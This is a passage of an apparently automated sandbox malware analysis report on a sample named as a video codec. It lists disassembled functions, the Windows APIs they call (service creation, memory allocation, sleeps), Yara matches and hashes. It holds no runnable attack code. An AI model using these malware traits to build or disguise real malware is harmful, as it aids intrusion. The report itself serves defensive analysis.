                                                                                                      • Instruction Fuzzy Hash: 79019670214606AFDB04CF59D885F55F7A9FF44320B64C39DE828872C0EB70E811CBA0
                                                                                                      Function 02BCDC67 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 02BCD39A: __EH_prolog.LIBCMT ref: 02BCD39F
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02BCDC84
                                                                                                        • Part of subcall function 02BD453A: RaiseException.KERNEL32(?,?,02BCFB35,?,?,?,?,?,?,?,02BCFB35,?,02BF0F98,?), ref: 02BD458F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionException@8H_prologRaiseThrow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1681477883-0
                                                                                                      • Opcode ID: f4a0cc72595b2a760185a543839f05af4bf35283372f5b76e831c349c226327a
                                                                                                      • Instruction ID: 091135920009ebacd8792c6da858ff57ad2926436dbec86c07b9cc761f52a607
                                                                                                      • Opcode Fuzzy Hash: f4a0cc72595b2a760185a543839f05af4bf35283372f5b76e831c349c226327a
                                                                                                      • Instruction Fuzzy Hash: 4CF04F719142096BD618ABA9D845D9B73FDEB08614B40459DF60693610EAA2B8448BA1
                                                                                                      Function 004025D4 Relevance: 1.5, APIs: 1, Instructions: 41libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: c377e47094d1c1f418745f8923c2daa3cfa784174354ddc77f39fa208488e0e1
                                                                                                      • Instruction ID: dad39ec4c4a36b0a020ba36cb40b54c5f2fcb52c5045fa4b7e1fd514a1d859ca
                                                                                                      • Opcode Fuzzy Hash: c377e47094d1c1f418745f8923c2daa3cfa784174354ddc77f39fa208488e0e1
                                                                                                      • Instruction Fuzzy Hash: 02014B34A0030ACBDB14CFA9D8D0B9637A0BB05750F6446AAD965EB295D734D90ACF26
                                                                                                      Function 02BCE527 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BCE52C
                                                                                                        • Part of subcall function 02BC26DB: RtlEnterCriticalSection.NTDLL(?), ref: 02BC2706
                                                                                                        • Part of subcall function 02BC26DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02BC272B
                                                                                                        • Part of subcall function 02BC26DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BE5B33), ref: 02BC2738
                                                                                                        • Part of subcall function 02BC26DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02BC2778
                                                                                                        • Part of subcall function 02BC26DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02BC27D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                      • String ID:
                                                                                                      • API String ID: 4293676635-0
                                                                                                      • Opcode ID: 7b844d4148247cb796d0de53028a419c8485180186bc7c0409f1fba2607740fc
                                                                                                      • Instruction ID: e152ae026d3c1f41e06784648db8e539c7fcade7a91d68808a6bf5fbe45219d9
                                                                                                      • Opcode Fuzzy Hash: 7b844d4148247cb796d0de53028a419c8485180186bc7c0409f1fba2607740fc
                                                                                                      • Instruction Fuzzy Hash: 9D0190B1911B049FC718CF1AC540946FBF9EF88710B15C6EE985A8B721E7B1AA40CF94
                                                                                                      Function 02BCE306 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BCE30B
                                                                                                        • Part of subcall function 02BD3B2C: _malloc.LIBCMT ref: 02BD3B44
                                                                                                        • Part of subcall function 02BCE527: __EH_prolog.LIBCMT ref: 02BCE52C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$_malloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 4254904621-0
                                                                                                      • Opcode ID: 8ac96a6933e4905676d7868d2740058d6974515f833d87b9944fd14abd831c1c
                                                                                                      • Instruction ID: d923ea9cdeea6015a87f4b3f06a75a67ad6026987141cebf8248c2eec7e1a929
                                                                                                      • Opcode Fuzzy Hash: 8ac96a6933e4905676d7868d2740058d6974515f833d87b9944fd14abd831c1c
                                                                                                      • Instruction Fuzzy Hash: B3E0CD71A00105DFCF0DDFA8D800B7D77A6DB44300F1085EDB409D6640EB70D9008F04
                                                                                                      Function 02BD3432 Relevance: 1.5, APIs: 1, Instructions: 19COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 02BD5C3A: __getptd_noexit.LIBCMT ref: 02BD5C3B
                                                                                                        • Part of subcall function 02BD5C3A: __amsg_exit.LIBCMT ref: 02BD5C48
                                                                                                        • Part of subcall function 02BD3473: __getptd_noexit.LIBCMT ref: 02BD3477
                                                                                                        • Part of subcall function 02BD3473: __freeptd.LIBCMT ref: 02BD3491
                                                                                                        • Part of subcall function 02BD3473: RtlExitUserThread.NTDLL(?,00000000,?,02BD3453,00000000), ref: 02BD349A
                                                                                                      • __XcptFilter.LIBCMT ref: 02BD345F
                                                                                                        • Part of subcall function 02BD8D74: __getptd_noexit.LIBCMT ref: 02BD8D78
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                                      • String ID:
                                                                                                      • API String ID: 1405322794-0
                                                                                                      • Opcode ID: e3bd217db93d837dd49e5b4e578de8ec78d5666bf67bc70452037a3e6742a2d9
                                                                                                      • Instruction ID: 374adbb031a1cd6e49e30cb49302336eb1fdd622373d1b0627caf436ec8a38ad
                                                                                                      • Opcode Fuzzy Hash: e3bd217db93d837dd49e5b4e578de8ec78d5666bf67bc70452037a3e6742a2d9
                                                                                                      • Instruction Fuzzy Hash: BBE0ECF59046049FEB08BBA4D805FAD77B6AF44311F2405C8E102AB2B1EA75AD419F61
                                                                                                      Function 00402342 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CopyFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 1304948518-0
                                                                                                      • Opcode ID: c990979c1844e3b86e7c6809e5fb8eb5e46c0e9cbd060de99f8df69504127ef8
                                                                                                      • Instruction ID: 32c96c72d1fdc658770ac6147e863496cde44dd24ac3f560ed056d496bb7c34d
                                                                                                      • Opcode Fuzzy Hash: c990979c1844e3b86e7c6809e5fb8eb5e46c0e9cbd060de99f8df69504127ef8
                                                                                                      • Instruction Fuzzy Hash: A1C08CA494C216F9D00025A00F8CF33215C8700788B20817B3903B10C1C4BC948BF03F
                                                                                                      Function 0040220B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNELBASE ref: 0040220C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectory
                                                                                                      • String ID:
                                                                                                      • API String ID: 4241100979-0
                                                                                                      • Opcode ID: 4bd4fa03f0a192a976a056be9e61e5c0d78db41fa319a90d6d207b85695bff87
                                                                                                      • Instruction ID: eeb2a21f5a177b313222c4024f32d818217300d85d52e7011245ffeeed06a56a
                                                                                                      • Opcode Fuzzy Hash: 4bd4fa03f0a192a976a056be9e61e5c0d78db41fa319a90d6d207b85695bff87
                                                                                                      • Instruction Fuzzy Hash: B0B0927408A924E2C60223B00F1DDAF202C2E0A781331807BB682700D14AFC1A0B22BF
                                                                                                      Function 0040230D Relevance: 1.5, APIs: 1, Instructions: 10registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Open
                                                                                                      • String ID:
                                                                                                      • API String ID: 71445658-0
                                                                                                      • Opcode ID: ac16492dc500231346d158f7620a563ccfadfa18a928bd35894e83afd742e737
                                                                                                      • Instruction ID: a130fa5e48b560970f07615ca9469a598ec7d6b9975e09baeb9bbecdfdaf3fbf
                                                                                                      • Opcode Fuzzy Hash: ac16492dc500231346d158f7620a563ccfadfa18a928bd35894e83afd742e737
                                                                                                      • Instruction Fuzzy Hash: 93C00230A18116DBD7448AF18B482AA66A46B40348F6149BB9417B25C0E7BD968E6A1F
                                                                                                      Function 00402858 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ManagerOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1889721586-0
                                                                                                      • Opcode ID: a7b0b7e89708bd837af10ae4be236a98302593f610d11f17fd14d8da2e32efd4
                                                                                                      • Instruction ID: 942287d6cc7425515ac5a4c5928e916850624a1805b0f3c2f8add6f4f2a1b579
                                                                                                      • Opcode Fuzzy Hash: a7b0b7e89708bd837af10ae4be236a98302593f610d11f17fd14d8da2e32efd4
                                                                                                      • Instruction Fuzzy Hash: 6E9002302044129AC6900E105B9C018255351403163610439D786E40E4CA744489A51E
                                                                                                      Function 02C09483 Relevance: 1.4, APIs: 1, Instructions: 103sleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BFA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BFA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bfa000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 3472027048-0
                                                                                                      • Opcode ID: 802bcb9ad2d49aab931c12b5ae84b42f1df8a899bc4930c8730d95c2137fd4cb
                                                                                                      • Instruction ID: 5f9093244a21a3bb84b0d25fda0924e36b8f2e2c5f05901384be588e437b5845
                                                                                                      • Opcode Fuzzy Hash: 802bcb9ad2d49aab931c12b5ae84b42f1df8a899bc4930c8730d95c2137fd4cb
                                                                                                      • Instruction Fuzzy Hash: 69316FB290D610AFE3056E59DC81BBAB7E8EF58760F06492EE6C5D3200E6355841C6D7
                                                                                                      Function 0040222F Relevance: 1.3, APIs: 1, Instructions: 84COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 1452528299-0
                                                                                                      • Opcode ID: 7b6db3901bd67a4416983e2a8edd626fbd5c53e8406e17de7cd64e884ba0ab48
                                                                                                      • Instruction ID: 19d457f24e78600376c53a8485c156f40cee28a1337523e6f748313ffbe2c5e4
                                                                                                      • Opcode Fuzzy Hash: 7b6db3901bd67a4416983e2a8edd626fbd5c53e8406e17de7cd64e884ba0ab48
                                                                                                      • Instruction Fuzzy Hash: E9214935808242DBD704CFB4EE917A17BB0B705750F28827BC596B31E2C378890ADB1E
                                                                                                      Function 02BD2140 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 02BD15F0: OpenEventA.KERNEL32(00100002,00000000,00000000,C802D0CE), ref: 02BD1690
                                                                                                        • Part of subcall function 02BD15F0: CloseHandle.KERNEL32(00000000), ref: 02BD16A5
                                                                                                        • Part of subcall function 02BD15F0: ResetEvent.KERNEL32(00000000,C802D0CE), ref: 02BD16AF
                                                                                                        • Part of subcall function 02BD15F0: CloseHandle.KERNEL32(00000000,C802D0CE), ref: 02BD16E4
                                                                                                      • TlsSetValue.KERNEL32(0000002B,?), ref: 02BD218A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseEventHandle$OpenResetValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 1556185888-0
                                                                                                      • Opcode ID: 55c1b21f3d0ec2e3b11886d6ef6b5d03a3a31b87f504b54a35ed4518de6a7111
                                                                                                      • Instruction ID: 8926362e645b58adba1491f76ea6ff3bf13597b494a920b6a1ff8972238c63f8
                                                                                                      • Opcode Fuzzy Hash: 55c1b21f3d0ec2e3b11886d6ef6b5d03a3a31b87f504b54a35ed4518de6a7111
                                                                                                      • Instruction Fuzzy Hash: 01018471E40244ABD710CFACD845B9ABBA8EB05660F104796F925D3690E77569008A94
                                                                                                      Function 004027E3 Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 0040D62B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 3472027048-0
                                                                                                      • Opcode ID: 1dd41e6686bd822ea595729d237ab53c9cdcc9704c691854a431aa7eaaa3c26a
                                                                                                      • Instruction ID: 0b6dd63b63fbbc38307b0e82f0bb62100026e0ae42352c4b099ee0d801dcd9a1
                                                                                                      • Opcode Fuzzy Hash: 1dd41e6686bd822ea595729d237ab53c9cdcc9704c691854a431aa7eaaa3c26a
                                                                                                      • Instruction Fuzzy Hash: 33E0D861C0C7C0AFC3022A604A58A79BB18BF29304F2519B7E442761D1E43E0807A77F
                                                                                                      Function 004026BA Relevance: 1.3, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 004026C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: eedf54f1546ecde272d8f04992911208c152afd1baa7028af89c0e707a28f26e
                                                                                                      • Instruction ID: 74f137ddbcde1c77c26fe787cba9ddbea217936d1492596de739919d1302819c
                                                                                                      • Opcode Fuzzy Hash: eedf54f1546ecde272d8f04992911208c152afd1baa7028af89c0e707a28f26e
                                                                                                      • Instruction Fuzzy Hash: D5E0C271C14304AFC7019B248D8469EB7F4AF05320F018A6AF175B32C0C77C6929DBDA
                                                                                                      Function 00402222 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 004026C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 439dd529b9abb2b2adc7dce84e893a85a3a44bed3194729940265dbcb0abde27
                                                                                                      • Instruction ID: d24ba4203171b81c8d1ff0907d4106163ffdccce9a791f9bef02934f7126e645
                                                                                                      • Opcode Fuzzy Hash: 439dd529b9abb2b2adc7dce84e893a85a3a44bed3194729940265dbcb0abde27
                                                                                                      • Instruction Fuzzy Hash: D5D0C2318002049FD300AB408A45BAAB3B0BB04300F10803AE051721C0C3B858299BDA
                                                                                                      Function 00402865 Relevance: 1.3, APIs: 1, Instructions: 5sleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 0040D62B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 3472027048-0
                                                                                                      • Opcode ID: df2313319e77dccb116f50e8ab8f6206455693badbc0acb58ba5efbf54a0ed84
                                                                                                      • Instruction ID: eea654838261cd072344f1549b98415cc54984fc4591f7fcd9b81e2a24225462
                                                                                                      • Opcode Fuzzy Hash: df2313319e77dccb116f50e8ab8f6206455693badbc0acb58ba5efbf54a0ed84
                                                                                                      • Instruction Fuzzy Hash: 10A00131E88A0096E6402AE46F1AB3A2620BB05B01F26192B624A784D449BE144A6B9B

                                                                                                      Non-executed Functions

                                                                                                      Function 02BD08A0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 179windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 02BC9AAF: __EH_prolog.LIBCMT ref: 02BC9AB4
                                                                                                        • Part of subcall function 02BC9AAF: _Allocate.LIBCPMT ref: 02BC9B0B
                                                                                                        • Part of subcall function 02BC9AAF: _memmove.LIBCMT ref: 02BC9B62
                                                                                                      • _memset.LIBCMT ref: 02BD0919
                                                                                                      • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02BD0982
                                                                                                      • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02BD098A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                                                      • String ID: Unknown error$invalid string position
                                                                                                      • API String ID: 1854462395-1837348584
                                                                                                      • Opcode ID: 6ab8079cbb010f0a23f0d9eaf7f9b43ac0845497993dd0941a1cc850ccecbd30
                                                                                                      • Instruction ID: abcc03ea96aaa04dd3c1746255707ff2e3875cbe912e75a869915d56fce75ada
                                                                                                      • Opcode Fuzzy Hash: 6ab8079cbb010f0a23f0d9eaf7f9b43ac0845497993dd0941a1cc850ccecbd30
                                                                                                      • Instruction Fuzzy Hash: 9551AD702083419FEB14DF24C890B6EBBE4EB98344F500DAEF49297691E771E588CF52
                                                                                                      Function 00402170 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040D15A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CtrlDispatcherServiceStart
                                                                                                      • String ID: test
                                                                                                      • API String ID: 3789849863-3632233996
                                                                                                      • Opcode ID: 62d4dfb808210626677f020231cc8997fd32626447a6781c4c939b5edb5d32bc
                                                                                                      • Instruction ID: 73591cfe463514ed459f964e2c340f9966edd9af912481339b9f9d215462bc13
                                                                                                      • Opcode Fuzzy Hash: 62d4dfb808210626677f020231cc8997fd32626447a6781c4c939b5edb5d32bc
                                                                                                      • Instruction Fuzzy Hash: EEE01274D08344E9EB10DFA08A489796774AB45300B308077D50AB62D5C77D4E4F7A0F
                                                                                                      Function 0040D3E8 Relevance: 3.0, APIs: 2, Instructions: 9serviceCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateServiceA.ADVAPI32 ref: 0040D3E8
                                                                                                      • CloseServiceHandle.ADVAPI32(?), ref: 0040D3F9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Service$CloseCreateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 1873643653-0
                                                                                                      • Opcode ID: dbbf10d3d4f90bdd11982929392454f3b4702c9dbdfe5cd029521d635c4322fa
                                                                                                      • Instruction ID: 569c7dc1a6a3224979b4ee1e760b0c65d326e05aa0229ed68e38a6959c0f0250
                                                                                                      • Opcode Fuzzy Hash: dbbf10d3d4f90bdd11982929392454f3b4702c9dbdfe5cd029521d635c4322fa
                                                                                                      • Instruction Fuzzy Hash: D8C08C30808000EBCF209FA09F0C4183630A38032032280B9E082B20A0CB389D0EBB2C
                                                                                                      Function 02BD9508 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02BD4E76,?,?,?,00000001), ref: 02BD950D
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02BD9516
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                      • String ID:
                                                                                                      • API String ID: 3192549508-0
                                                                                                      • Opcode ID: 36c3bcd37fd3184ef47a58af34021f2cdc8f3d42dada6ae236118e3b4c72b06d
                                                                                                      • Instruction ID: 7e9564ce4a53050a7bc2fee71108ae38c28975db6190be14925ab15fb01497bc
                                                                                                      • Opcode Fuzzy Hash: 36c3bcd37fd3184ef47a58af34021f2cdc8f3d42dada6ae236118e3b4c72b06d
                                                                                                      • Instruction Fuzzy Hash: AAB09231484208EBCF412B91FC09B89BF28EB046A2F004C10F60E4A0528F625520ABA1
                                                                                                      Function 02BCF831 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2102423945-0
                                                                                                      • Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                                      • Instruction ID: b3eab8a2a3904000f9740385c404d5fd025e2537b5f21da15ed7101f31646e32
                                                                                                      • Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                                      • Instruction Fuzzy Hash: C5F082B1904309AAD700DF99D942B9DFBB9EB44314F20817AD50CA7340F6707A118B94
                                                                                                      Function 02BD8312 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 84COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RtlDecodePointer.NTDLL(?), ref: 02BD831A
                                                                                                      • _free.LIBCMT ref: 02BD8333
                                                                                                        • Part of subcall function 02BD2F54: HeapFree.KERNEL32(00000000,00000000,?,02BD5CB2,00000000,00000104,75920A60), ref: 02BD2F68
                                                                                                        • Part of subcall function 02BD2F54: GetLastError.KERNEL32(00000000,?,02BD5CB2,00000000,00000104,75920A60), ref: 02BD2F7A
                                                                                                      • _free.LIBCMT ref: 02BD8346
                                                                                                      • _free.LIBCMT ref: 02BD8364
                                                                                                      • _free.LIBCMT ref: 02BD8376
                                                                                                      • _free.LIBCMT ref: 02BD8387
                                                                                                      • _free.LIBCMT ref: 02BD8392
                                                                                                      • _free.LIBCMT ref: 02BD83B6
                                                                                                      • RtlEncodePointer.NTDLL(007E5930), ref: 02BD83BD
                                                                                                      • _free.LIBCMT ref: 02BD83D2
